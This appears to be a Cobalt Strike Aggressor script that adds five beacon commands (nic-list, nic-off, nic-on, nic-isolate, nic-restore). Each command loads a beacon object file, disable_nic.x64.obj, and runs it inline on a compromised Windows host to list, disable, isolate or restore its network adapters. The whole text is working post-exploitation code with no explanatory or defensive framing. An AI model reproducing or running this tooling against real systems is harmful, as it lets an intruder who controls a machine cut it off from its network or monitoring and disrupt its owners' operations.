alias nic-list {
    local('$f $data $args');
    $f    = openf(script_resource("src\\disable_nic.x64.obj"));
    $data = readb($f, -1);
    closef($f);
    $args = bof_pack($1, "zi", $2, 2);
    beacon_inline_execute($1, $data, "go", $args);
}

alias nic-off {
    local('$f $data $args');
    $f    = openf(script_resource("src\\disable_nic.x64.obj"));
    $data = readb($f, -1);
    closef($f);
    $args = bof_pack($1, "zi", $2, 0);
    beacon_inline_execute($1, $data, "go", $args);
}

alias nic-on {
    local('$f $data $args');
    $f    = openf(script_resource("src\\disable_nic.x64.obj"));
    $data = readb($f, -1);
    closef($f);
    $args = bof_pack($1, "zi", $2, 1);
    beacon_inline_execute($1, $data, "go", $args);
}

alias nic-isolate {
    local('$f $data $args');
    $f    = openf(script_resource("src\\disable_nic.x64.obj"));
    $data = readb($f, -1);
    closef($f);
    $args = bof_pack($1, "zi", $2, 3);
    beacon_inline_execute($1, $data, "go", $args);
}

alias nic-restore {
    local('$f $data $args');
    $f    = openf(script_resource("src\\disable_nic.x64.obj"));
    $data = readb($f, -1);
    closef($f);
    $args = bof_pack($1, "zi", $2, 4);
    beacon_inline_execute($1, $data, "go", $args);
}
